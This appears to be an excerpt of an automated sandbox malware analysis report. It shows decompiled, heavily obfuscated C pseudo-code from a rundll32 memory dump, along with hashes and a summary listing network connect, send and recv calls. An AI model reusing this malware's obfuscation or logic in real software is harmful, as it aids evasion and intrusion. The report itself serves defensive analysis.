                                                                                                                    0x00346564
                                                                                                                    0x0034656f
                                                                                                                    0x0034657d
                                                                                                                    0x003465bd
                                                                                                                    0x003465ca
                                                                                                                    0x003465ce
                                                                                                                    0x003465dc
                                                                                                                    0x003465f1
                                                                                                                    0x003465f6
                                                                                                                    0x003465f9
                                                                                                                    0x00000000
                                                                                                                    0x00346515
                                                                                                                    0x00346515
                                                                                                                    0x0034651b
                                                                                                                    0x00000000
                                                                                                                    0x00346521
                                                                                                                    0x0034653e
                                                                                                                    0x00346543
                                                                                                                    0x0034651b
                                                                                                                    0x00346513
                                                                                                                    0x00000000
                                                                                                                    0x00346626
                                                                                                                    0x00346626
                                                                                                                    0x00346626
                                                                                                                    0x00000000
                                                                                                                    0x00346632
                                                                                                                    0x003463a6

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                    • API String ID: 0-2231434368
                                                                                                                    • Opcode ID: fd3cdb6952d804708a984ec329b2e9c68769045601593e9f3f6e21878d29ac78
                                                                                                                    • Instruction ID: 32bb65b8d54a344f3becbea6b264999509828e5e3e66b9f91a851a77ae3da762
                                                                                                                    • Opcode Fuzzy Hash: fd3cdb6952d804708a984ec329b2e9c68769045601593e9f3f6e21878d29ac78
                                                                                                                    • Instruction Fuzzy Hash: 84224471508380DFD369CF25C58AA9BFBE2FBC5344F10891DE29A8A260D7B49849CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00346DF8 Relevance: 15.5, Strings: 12, Instructions: 510COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00346DF8(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				short _v1568;
				short _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				signed int _v1836;
				signed int _v1840;
				signed int _v1844;
				void* _t583;
				void* _t585;
				void* _t592;
				void* _t603;
				void* _t606;
				void* _t609;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				void* _t620;
				signed int _t674;
				char _t675;
				void* _t677;
				signed int* _t682;

				_t682 =  &_v1844;
				_v1580 = 0x812dcc;
				_v1600 = 0;
				_v1572 = 0;
				_v1568 = 0;
				_v1576 = 0x4b1be1;
				_v1604 = 0xb0e9fc;
				_v1604 = _v1604 >> 0xe;
				_v1604 = _v1604 ^ 0x020002c3;
				_v1816 = 0x316963;
				_v1816 = _v1816 ^ 0x05c37e76;
				_v1816 = _v1816 * 0x44;
				_t609 = __ecx;
				_v1816 = _v1816 << 6;
				_t677 = 0xb42e112;
				_v1816 = _v1816 ^ 0x13878f70;
				_v1648 = 0xe65aa1;
				_v1648 = _v1648 + 0xffffb7c7;
				_v1648 = _v1648 ^ 0x00e866e0;
				_v1608 = 0x4e6d43;
				_v1608 = _v1608 << 3;
				_v1608 = _v1608 ^ 0x027e4d7c;
				_v1792 = 0x62c447;
				_v1792 = _v1792 + 0xfffff9b0;
				_v1792 = _v1792 + 0xffff1ab6;
				_v1792 = _v1792 ^ 0x5826ec20;
				_v1792 = _v1792 ^ 0x58465e47;
				_v1616 = 0xd881ce;
				_t611 = 0x1c;
				_v1616 = _v1616 / _t611;
				_v1616 = _v1616 ^ 0x00049a8c;
				_v1784 = 0x225701;
				_v1784 = _v1784 ^ 0x455f73cc;
				_v1784 = _v1784 + 0x2d0b;
				_v1784 = _v1784 + 0xffff7069;
				_v1784 = _v1784 ^ 0x457ed570;
				_v1656 = 0xa0746c;
				_v1656 = _v1656 << 5;
				_v1656 = _v1656 ^ 0x1405cb88;
				_v1756 = 0x86f3a;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 + 0xffff9aa0;
				_v1756 = _v1756 ^ 0x379e88f8;
				_v1840 = 0x372205;
				_v1840 = _v1840 << 0xb;
				_v1840 = _v1840 >> 1;
				_t612 = 0x47;
				_v1840 = _v1840 * 0x27;
				_v1840 = _v1840 ^ 0x18b0e4c5;
				_v1720 = 0x55473e;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 + 0xffff4222;
				_v1720 = _v1720 ^ 0xfff7d1f7;
				_v1760 = 0x8a22d4;
				_v1760 = _v1760 ^ 0x5338d916;
				_v1760 = _v1760 / _t612;
				_v1760 = _v1760 ^ 0x01221ec9;
				_v1716 = 0x7ad7ec;
				_v1716 = _v1716 ^ 0xb2734e10;
				_v1716 = _v1716 ^ 0xf628ba0e;
				_v1716 = _v1716 ^ 0x44287105;
				_v1624 = 0x6426f4;
				_v1624 = _v1624 * 0x29;
				_v1624 = _v1624 ^ 0x100ef306;
				_v1728 = 0x3e505e;
				_v1728 = _v1728 >> 8;
				_t613 = 0x3a;
				_v1728 = _v1728 / _t613;
				_v1728 = _v1728 ^ 0x00050efb;
				_v1752 = 0x3958e2;
				_v1752 = _v1752 ^ 0x62ae6d50;
				_v1752 = _v1752 ^ 0x97f7befb;
				_v1752 = _v1752 ^ 0xf561088c;
				_v1688 = 0xb21a91;
				_v1688 = _v1688 ^ 0x7ffc0397;
				_v1688 = _v1688 ^ 0x7f439e8f;
				_v1620 = 0xd8d2d1;
				_v1620 = _v1620 + 0x194e;
				_v1620 = _v1620 ^ 0x00d523c5;
				_v1696 = 0xa820cb;
				_v1696 = _v1696 + 0x8b3c;
				_v1696 = _v1696 ^ 0x00a28581;
				_v1680 = 0x121bc4;
				_t674 = 0x7a;
				_v1680 = _v1680 / _t674;
				_v1680 = _v1680 ^ 0x0006e996;
				_v1744 = 0x9924c6;
				_v1744 = _v1744 << 4;
				_t614 = 0x11;
				_v1744 = _v1744 * 0x36;
				_v1744 = _v1744 ^ 0x04d385a1;
				_v1632 = 0x653a8;
				_v1632 = _v1632 * 0x63;
				_v1632 = _v1632 ^ 0x027c9a7f;
				_v1672 = 0x158278;
				_v1672 = _v1672 + 0xffff088d;
				_v1672 = _v1672 ^ 0x001491ab;
				_v1832 = 0x486b88;
				_v1832 = _v1832 + 0xffff9f3d;
				_v1832 = _v1832 >> 3;
				_v1832 = _v1832 | 0x023d4c2b;
				_v1832 = _v1832 ^ 0x0230cd37;
				_v1612 = 0xd2c4ef;
				_v1612 = _v1612 * 0x5a;
				_v1612 = _v1612 ^ 0x4a177333;
				_v1776 = 0x829598;
				_v1776 = _v1776 << 0xe;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 | 0x8c8c5501;
				_v1776 = _v1776 ^ 0xaddb19b6;
				_v1712 = 0x169d18;
				_v1712 = _v1712 / _t614;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x000c26db;
				_v1704 = 0xb2b50;
				_v1704 = _v1704 ^ 0x2de07b8f;
				_v1704 = _v1704 ^ 0x2de0ad86;
				_v1800 = 0x9652d5;
				_t615 = 3;
				_v1800 = _v1800 * 0x68;
				_v1800 = _v1800 / _t615;
				_v1800 = _v1800 << 0xa;
				_v1800 = _v1800 ^ 0x6cd74e85;
				_v1664 = 0x74acab;
				_v1664 = _v1664 | 0xe18c4dd2;
				_v1664 = _v1664 ^ 0xe1f0b032;
				_v1824 = 0x58e83b;
				_t616 = 0x2c;
				_v1824 = _v1824 * 0x2b;
				_v1824 = _v1824 + 0xffff56af;
				_v1824 = _v1824 ^ 0x0c61ca29;
				_v1824 = _v1824 ^ 0x02809c1e;
				_v1764 = 0x974237;
				_v1764 = _v1764 << 0xb;
				_v1764 = _v1764 * 0x31;
				_v1764 = _v1764 ^ 0x9d674e65;
				_v1736 = 0xc3f98b;
				_v1736 = _v1736 * 0x5e;
				_v1736 = _v1736 | 0x641bd8e3;
				_v1736 = _v1736 ^ 0x67f85735;
				_v1700 = 0xe4f15c;
				_v1700 = _v1700 | 0xddaa88b0;
				_v1700 = _v1700 ^ 0xdde3c6d3;
				_v1844 = 0x9b3502;
				_v1844 = _v1844 ^ 0x47d60286;
				_v1844 = _v1844 / _t616;
				_v1844 = _v1844 ^ 0x0193d551;
				_v1640 = 0xffe1b1;
				_t617 = 0x39;
				_v1640 = _v1640 * 0x7b;
				_v1640 = _v1640 ^ 0x7af2e2c5;
				_v1808 = 0x2876e6;
				_v1808 = _v1808 | 0x109585e0;
				_v1808 = _v1808 << 0xd;
				_v1808 = _v1808 + 0x9cd3;
				_v1808 = _v1808 ^ 0xbefbba98;
				_v1676 = 0xd3b2e1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 ^ 0xd9748eec;
				_v1836 = 0x3e007f;
				_v1836 = _v1836 + 0xffffe462;
				_v1836 = _v1836 >> 9;
				_v1836 = _v1836 >> 6;
				_v1836 = _v1836 ^ 0x000afa23;
				_v1684 = 0x2c402;
				_v1684 = _v1684 >> 0xa;
				_v1684 = _v1684 ^ 0x0000130c;
				_v1692 = 0x94252b;
				_v1692 = _v1692 / _t617;
				_v1692 = _v1692 ^ 0x000dcb04;
				_v1828 = 0xd5c7f6;
				_v1828 = _v1828 * 0x41;
				_v1828 = _v1828 + 0x5616;
				_v1828 = _v1828 >> 9;
				_v1828 = _v1828 ^ 0x001e39c7;
				_v1740 = 0xceff06;
				_v1740 = _v1740 << 0xe;
				_v1740 = _v1740 << 8;
				_v1740 = _v1740 ^ 0xc18fb5bb;
				_v1748 = 0x414330;
				_v1748 = _v1748 * 0x1d;
				_v1748 = _v1748 | 0x5a6f0d55;
				_v1748 = _v1748 ^ 0x5f6ea92a;
				_v1668 = 0xd2b255;
				_v1668 = _v1668 ^ 0xc5d7949e;
				_v1668 = _v1668 ^ 0xc50ba027;
				_v1796 = 0xab825d;
				_v1796 = _v1796 << 0xc;
				_v1796 = _v1796 + 0xd01b;
				_t618 = 0x22;
				_v1796 = _v1796 / _t618;
				_v1796 = _v1796 ^ 0x056bf222;
				_v1724 = 0x6f3f31;
				_v1724 = _v1724 + 0x5a62;
				_v1724 = _v1724 / _t674;
				_v1724 = _v1724 ^ 0x0002d040;
				_v1652 = 0x230f16;
				_v1652 = _v1652 ^ 0x902061d9;
				_v1652 = _v1652 ^ 0x9007a9ef;
				_v1804 = 0xb250d0;
				_v1804 = _v1804 << 7;
				_v1804 = _v1804 << 0xe;
				_v1804 = _v1804 >> 0x10;
				_v1804 = _v1804 ^ 0x000e0b76;
				_v1644 = 0x39b2ec;
				_v1644 = _v1644 >> 5;
				_v1644 = _v1644 ^ 0x0004ae9a;
				_v1708 = 0x41b5f8;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xfffffd74;
				_v1708 = _v1708 ^ 0x836650ae;
				_v1768 = 0xd924a5;
				_t619 = 0x26;
				_v1768 = _v1768 * 0x57;
				_v1768 = _v1768 >> 4;
				_v1768 = _v1768 ^ 0x04932b37;
				_v1788 = 0x72a9d;
				_v1788 = _v1788 >> 0xb;
				_v1788 = _v1788 * 0x3f;
				_v1788 = _v1788 + 0xffffc8d5;
				_v1788 = _v1788 ^ 0x000eb520;
				_v1628 = 0x50edf9;
				_v1628 = _v1628 * 0x73;
				_v1628 = _v1628 ^ 0x245d5801;
				_v1772 = 0x77fe3c;
				_v1772 = _v1772 + 0x89a9;
				_v1772 = _v1772 | 0x772eb6e7;
				_v1772 = _v1772 + 0xffffc435;
				_v1772 = _v1772 ^ 0x777a10e8;
				_v1780 = 0x481950;
				_v1780 = _v1780 >> 0xb;
				_v1780 = _v1780 | 0x104efd63;
				_v1780 = _v1780 + 0xffffd02c;
				_v1780 = _v1780 ^ 0x1043876c;
				_v1636 = 0x899427;
				_v1636 = _v1636 << 0x10;
				_v1636 = _v1636 ^ 0x942ef0bd;
				_v1812 = 0xafb495;
				_v1812 = _v1812 | 0xf73eef3e;
				_v1812 = _v1812 + 0xffffb280;
				_v1812 = _v1812 ^ 0xf7b4985a;
				_v1732 = 0xe6dab0;
				_v1732 = _v1732 + 0x38b;
				_v1732 = _v1732 | 0x5f912f35;
				_v1732 = _v1732 ^ 0x5ff91c81;
				_v1660 = 0xa1ff8d;
				_v1660 = _v1660 / _t619;
				_v1660 = _v1660 ^ 0x000a69c5;
				_v1820 = 0xd15a88;
				_v1820 = _v1820 ^ 0xcd50b9e8;
				_v1820 = _v1820 >> 0x10;
				_v1820 = _v1820 ^ 0xf9319330;
				_v1820 = _v1820 ^ 0xf933c487;
				_t675 = _v1600;
				while(1) {
					L1:
					while(1) {
						L2:
						_t620 = 0x424d9d2;
						do {
							L3:
							while(_t677 != 0x19ebf08) {
								if(_t677 == _t620) {
									_push(_v1600);
									_push(_v1808);
									_t585 = E0034D389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
									_t682 =  &(_t682[7]);
									__eflags = _t585;
									if(__eflags != 0) {
										E00341E67(_v1676, _v1836, _v1684, _v1692, _v1596);
										E00341E67(_v1828, _v1740, _v1748, _v1668, _v1592);
										_t682 =  &(_t682[6]);
									}
									L14:
									_t677 = 0x19ebf08;
									while(1) {
										L1:
										L2:
										_t620 = 0x424d9d2;
										goto L3;
									}
								}
								if(_t677 == 0x5bc69f5) {
									_t592 = E0034D2CE(_t620);
									__eflags = _t592 - E00333DE2(_t620);
									_t583 = 0x7574965;
									_t677 = 0x8166b1d;
									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
									goto L2;
								}
								if(_t677 == 0x8166b1d) {
									__eflags = _t675 - _t583;
									if(__eflags != 0) {
										_t677 = 0xd369ee2;
										continue;
									}
									_push(_t620);
									_push(_t620);
									_t606 = E0034BB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
									_t682 =  &(_t682[6]);
									__eflags = _t606;
									if(__eflags == 0) {
										L12:
										return _t606;
									}
									_t677 = 0xd369ee2;
									goto L1;
								}
								if(_t677 == 0xb42e112) {
									_t677 = 0x5bc69f5;
									continue;
								}
								if(_t677 == 0xd369ee2) {
									E0034DA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
									 *((short*)(E0033B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
									E00338969(_v1688,  &_v524, __eflags, _v1620, _v1696);
									_push(_v1632);
									_push(_v1744);
									E003347CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E0034DCF7(_v1680, 0x331328, __eflags),  &_v524, _v1776, _v1712);
									E0033A8B0(_v1704, _t598, _v1800);
									_t603 = E0033EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
									_t682 =  &(_t682[0x17]);
									__eflags = _t603;
									if(__eflags != 0) {
										_t583 = 0x7574965;
										__eflags = _t675 - 0x7574965;
										_t620 = 0x424d9d2;
										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
										continue;
									}
									goto L14;
								}
								_t696 = _t677 - 0xe2e667c;
								if(_t677 != 0xe2e667c) {
									goto L25;
								}
								_push(_v1804);
								_push( &_v1564);
								_push(_t620);
								_push(0);
								_push( &_v1596);
								_push(_v1652);
								_push(0);
								_t606 = E0033AB87(_v1796, _v1724, _t696);
								if(_t606 == 0) {
									goto L12;
								}
								E00341E67(_v1644, _v1708, _v1768, _v1788, _v1596);
								return E00341E67(_v1628, _v1772, _v1780, _v1636, _v1592);
							}
							E00341E67(_v1812, _v1732, _v1660, _v1820, _v1600);
							_t682 =  &(_t682[3]);
							_t677 = 0xe6feec1;
							_t583 = 0x7574965;
							_t620 = 0x424d9d2;
							L25:
							__eflags = _t677 - 0xe6feec1;
						} while (__eflags != 0);
						return _t583;
					}
				}
			}






























































































                                                                                                                    0x00346df8
                                                                                                                    0x00346dfe
                                                                                                                    0x00346e0b
                                                                                                                    0x00346e14
                                                                                                                    0x00346e1b
                                                                                                                    0x00346e22
                                                                                                                    0x00346e2d
                                                                                                                    0x00346e38
                                                                                                                    0x00346e40
                                                                                                                    0x00346e4b
                                                                                                                    0x00346e53
                                                                                                                    0x00346e64
                                                                                                                    0x00346e68
                                                                                                                    0x00346e6a
                                                                                                                    0x00346e6f
                                                                                                                    0x00346e74
                                                                                                                    0x00346e7c
                                                                                                                    0x00346e87
                                                                                                                    0x00346e92
                                                                                                                    0x00346e9d
                                                                                                                    0x00346ea8
                                                                                                                    0x00346eb0
                                                                                                                    0x00346ebb
                                                                                                                    0x00346ec3
                                                                                                                    0x00346ecb
                                                                                                                    0x00346ed3
                                                                                                                    0x00346edb
                                                                                                                    0x00346ee3
                                                                                                                    0x00346ef7
                                                                                                                    0x00346efc
                                                                                                                    0x00346f05
                                                                                                                    0x00346f10
                                                                                                                    0x00346f18
                                                                                                                    0x00346f20
                                                                                                                    0x00346f28
                                                                                                                    0x00346f30
                                                                                                                    0x00346f38
                                                                                                                    0x00346f43
                                                                                                                    0x00346f4b
                                                                                                                    0x00346f56
                                                                                                                    0x00346f5e
                                                                                                                    0x00346f63
                                                                                                                    0x00346f6b
                                                                                                                    0x00346f73
                                                                                                                    0x00346f7b
                                                                                                                    0x00346f80
                                                                                                                    0x00346f89
                                                                                                                    0x00346f8a
                                                                                                                    0x00346f8e
                                                                                                                    0x00346f96
                                                                                                                    0x00346fa1
                                                                                                                    0x00346fa9
                                                                                                                    0x00346fb4
                                                                                                                    0x00346fbf
                                                                                                                    0x00346fc7
                                                                                                                    0x00346fd5
                                                                                                                    0x00346fd9
                                                                                                                    0x00346fe1
                                                                                                                    0x00346fec
                                                                                                                    0x00346ff7
                                                                                                                    0x00347002
                                                                                                                    0x0034700d
                                                                                                                    0x00347020
                                                                                                                    0x00347027
                                                                                                                    0x00347032
                                                                                                                    0x0034703d
                                                                                                                    0x00347050
                                                                                                                    0x00347055
                                                                                                                    0x0034705e
                                                                                                                    0x00347069
                                                                                                                    0x00347071
                                                                                                                    0x00347079
                                                                                                                    0x00347081
                                                                                                                    0x00347089
                                                                                                                    0x00347094
                                                                                                                    0x0034709f
                                                                                                                    0x003470aa
                                                                                                                    0x003470b5
                                                                                                                    0x003470c0
                                                                                                                    0x003470cb
                                                                                                                    0x003470d6
                                                                                                                    0x003470e1
                                                                                                                    0x003470ec
                                                                                                                    0x003470fe
                                                                                                                    0x00347103
                                                                                                                    0x0034710c
                                                                                                                    0x00347117
                                                                                                                    0x0034711f
                                                                                                                    0x00347129
                                                                                                                    0x0034712c
                                                                                                                    0x00347130
                                                                                                                    0x00347138
                                                                                                                    0x0034714b
                                                                                                                    0x00347152
                                                                                                                    0x0034715d
                                                                                                                    0x00347168
                                                                                                                    0x00347173
                                                                                                                    0x0034717e
                                                                                                                    0x00347186
                                                                                                                    0x0034718e
                                                                                                                    0x00347193
                                                                                                                    0x0034719b
                                                                                                                    0x003471a3
                                                                                                                    0x003471b6
                                                                                                                    0x003471bd
                                                                                                                    0x003471c8
                                                                                                                    0x003471d0
                                                                                                                    0x003471d5
                                                                                                                    0x003471da
                                                                                                                    0x003471e2
                                                                                                                    0x003471ea
                                                                                                                    0x00347200
                                                                                                                    0x00347207
                                                                                                                    0x0034720f
                                                                                                                    0x0034721a
                                                                                                                    0x00347225
                                                                                                                    0x00347230
                                                                                                                    0x0034723b
                                                                                                                    0x00347248
                                                                                                                    0x00347249
                                                                                                                    0x00347253
                                                                                                                    0x00347257
                                                                                                                    0x0034725c
                                                                                                                    0x00347264
                                                                                                                    0x0034726f
                                                                                                                    0x0034727a
                                                                                                                    0x00347285
                                                                                                                    0x00347296
                                                                                                                    0x00347299
                                                                                                                    0x0034729d
                                                                                                                    0x003472a5
                                                                                                                    0x003472ad
                                                                                                                    0x003472b5
                                                                                                                    0x003472bd
                                                                                                                    0x003472c7
                                                                                                                    0x003472cb
                                                                                                                    0x003472d3
                                                                                                                    0x003472e6
                                                                                                                    0x003472ed
                                                                                                                    0x003472f8
                                                                                                                    0x00347303
                                                                                                                    0x0034730e
                                                                                                                    0x00347319
                                                                                                                    0x00347324
                                                                                                                    0x0034732c
                                                                                                                    0x00347344
                                                                                                                    0x00347348
                                                                                                                    0x00347350
                                                                                                                    0x00347363
                                                                                                                    0x00347366
                                                                                                                    0x0034736d
                                                                                                                    0x00347378
                                                                                                                    0x00347380
                                                                                                                    0x00347388
                                                                                                                    0x0034738d
                                                                                                                    0x00347395
                                                                                                                    0x0034739d
                                                                                                                    0x003473a8
                                                                                                                    0x003473b0
                                                                                                                    0x003473bb
                                                                                                                    0x003473c3
                                                                                                                    0x003473cb
                                                                                                                    0x003473d0
                                                                                                                    0x003473d5
                                                                                                                    0x003473dd
                                                                                                                    0x003473e8
                                                                                                                    0x003473f0
                                                                                                                    0x003473fb
                                                                                                                    0x0034740f
                                                                                                                    0x00347416
                                                                                                                    0x00347421
                                                                                                                    0x0034742e
                                                                                                                    0x00347432
                                                                                                                    0x0034743a
                                                                                                                    0x0034743f
                                                                                                                    0x00347447
                                                                                                                    0x0034744f
                                                                                                                    0x00347454
                                                                                                                    0x00347459
                                                                                                                    0x00347461
                                                                                                                    0x0034746e
                                                                                                                    0x00347472
                                                                                                                    0x0034747a
                                                                                                                    0x00347482
                                                                                                                    0x0034748d
                                                                                                                    0x00347498
                                                                                                                    0x003474a3
                                                                                                                    0x003474ab
                                                                                                                    0x003474b0
                                                                                                                    0x003474be
                                                                                                                    0x003474c8
                                                                                                                    0x003474cc
                                                                                                                    0x003474d4
                                                                                                                    0x003474df
                                                                                                                    0x003474f5
                                                                                                                    0x003474fe
                                                                                                                    0x00347509
                                                                                                                    0x00347514
                                                                                                                    0x0034751f
                                                                                                                    0x0034752a
                                                                                                                    0x00347532
                                                                                                                    0x00347537
                                                                                                                    0x0034753c
                                                                                                                    0x00347541
                                                                                                                    0x00347549
                                                                                                                    0x00347554
                                                                                                                    0x0034755c
                                                                                                                    0x00347567
                                                                                                                    0x00347572
                                                                                                                    0x0034757a
                                                                                                                    0x00347585
                                                                                                                    0x00347590
                                                                                                                    0x0034759d
                                                                                                                    0x0034759e
                                                                                                                    0x003475a2
                                                                                                                    0x003475a7
                                                                                                                    0x003475af
                                                                                                                    0x003475b7
                                                                                                                    0x003475c1
                                                                                                                    0x003475c5
                                                                                                                    0x003475cd
                                                                                                                    0x003475d5
                                                                                                                    0x003475e8
                                                                                                                    0x003475ef
                                                                                                                    0x003475fa
                                                                                                                    0x00347602
                                                                                                                    0x0034760a
                                                                                                                    0x00347612
                                                                                                                    0x0034761a
                                                                                                                    0x00347622
                                                                                                                    0x0034762a
                                                                                                                    0x0034762f
                                                                                                                    0x00347637
                                                                                                                    0x0034763f
                                                                                                                    0x00347647
                                                                                                                    0x00347652
                                                                                                                    0x0034765a
                                                                                                                    0x00347665
                                                                                                                    0x0034766d
                                                                                                                    0x00347675
                                                                                                                    0x0034767d
                                                                                                                    0x00347685
                                                                                                                    0x00347690
                                                                                                                    0x0034769b
                                                                                                                    0x003476a6
                                                                                                                    0x003476b1
                                                                                                                    0x003476c5
                                                                                                                    0x003476cc
                                                                                                                    0x003476d7
                                                                                                                    0x003476df
                                                                                                                    0x003476e7
                                                                                                                    0x003476ec
                                                                                                                    0x003476f4
                                                                                                                    0x003476fc
                                                                                                                    0x00347703
                                                                                                                    0x00347703
                                                                                                                    0x00347708
                                                                                                                    0x00347708
                                                                                                                    0x00347708
                                                                                                                    0x0034770d
                                                                                                                    0x00000000
                                                                                                                    0x0034770d
                                                                                                                    0x00347717
                                                                                                                    0x0034799c
                                                                                                                    0x003479aa
                                                                                                                    0x003479ca
                                                                                                                    0x003479cf
                                                                                                                    0x003479d2
                                                                                                                    0x003479d4
                                                                                                                    0x003479fa
                                                                                                                    0x00347a1f
                                                                                                                    0x00347a24
                                                                                                                    0x00347a24
                                                                                                                    0x003478e9
                                                                                                                    0x003478e9
                                                                                                                    0x00347703
                                                                                                                    0x00347703
                                                                                                                    0x00347708
                                                                                                                    0x00347708
                                                                                                                    0x00000000
                                                                                                                    0x00347708
                                                                                                                    0x00347703
                                                                                                                    0x00347723
                                                                                                                    0x00347977
                                                                                                                    0x00347983
                                                                                                                    0x0034798a
                                                                                                                    0x0034798f
                                                                                                                    0x00347994
                                                                                                                    0x00000000
                                                                                                                    0x00347994
                                                                                                                    0x0034772f
                                                                                                                    0x00347913
                                                                                                                    0x00347915
                                                                                                                    0x00347957
                                                                                                                    0x00000000
                                                                                                                    0x00347957
                                                                                                                    0x00347917
                                                                                                                    0x00347918
                                                                                                                    0x0034793d
                                                                                                                    0x00347942
                                                                                                                    0x00347945
                                                                                                                    0x00347947
                                                                                                                    0x003477e4
                                                                                                                    0x003477e4
                                                                                                                    0x003477e4
                                                                                                                    0x0034794d
                                                                                                                    0x00000000
                                                                                                                    0x0034794d
                                                                                                                    0x0034773b
                                                                                                                    0x00347909
                                                                                                                    0x00000000
                                                                                                                    0x00347909
                                                                                                                    0x00347747
                                                                                                                    0x00347804
                                                                                                                    0x0034783e
                                                                                                                    0x00347848
                                                                                                                    0x0034784d
                                                                                                                    0x00347859
                                                                                                                    0x003478a6
                                                                                                                    0x003478b8
                                                                                                                    0x003478dd
                                                                                                                    0x003478e2
                                                                                                                    0x003478e5
                                                                                                                    0x003478e7
                                                                                                                    0x003478f0
                                                                                                                    0x003478fa
                                                                                                                    0x003478fc
                                                                                                                    0x00347901
                                                                                                                    0x00000000
                                                                                                                    0x00347901
                                                                                                                    0x00000000
                                                                                                                    0x003478e7
                                                                                                                    0x0034774d
                                                                                                                    0x00347753
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00347759
                                                                                                                    0x00347764
                                                                                                                    0x00347765
                                                                                                                    0x00347766
                                                                                                                    0x0034776f
                                                                                                                    0x00347770
                                                                                                                    0x00347782
                                                                                                                    0x00347784
                                                                                                                    0x0034778e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003477ad
                                                                                                                    0x00000000
                                                                                                                    0x003477d7
                                                                                                                    0x00347a49
                                                                                                                    0x00347a4e
                                                                                                                    0x00347a51
                                                                                                                    0x00347a56
                                                                                                                    0x00347a5b
                                                                                                                    0x00347a60
                                                                                                                    0x00347a60
                                                                                                                    0x00347a60
                                                                                                                    0x00000000
                                                                                                                    0x0034770d
                                                                                                                    0x00347708

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 1?o$;X$>GU$CmN$G^FX$UoZ$^P>$bZ$ci1$X9$f$v(
                                                                                                                    • API String ID: 0-2206596976
                                                                                                                    • Opcode ID: 774e4cb58658125458335f69690b0d827648cf5993753a4c6b7ddc5dd3396218
                                                                                                                    • Instruction ID: 4a93c34ba22f261829b28e43676bdae2753b01e3d3f3812f8f15b3ac96b3e3bf
                                                                                                                    • Opcode Fuzzy Hash: 774e4cb58658125458335f69690b0d827648cf5993753a4c6b7ddc5dd3396218
                                                                                                                    • Instruction Fuzzy Hash: CC52FD715083819BD379CF21C58AB9FBBE1BBC4308F108A1DE5DA9A260D7B19949CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 10012C6C
                                                                                                                    • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                    • _strcat.LIBCMT ref: 10012CE9
                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                    • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
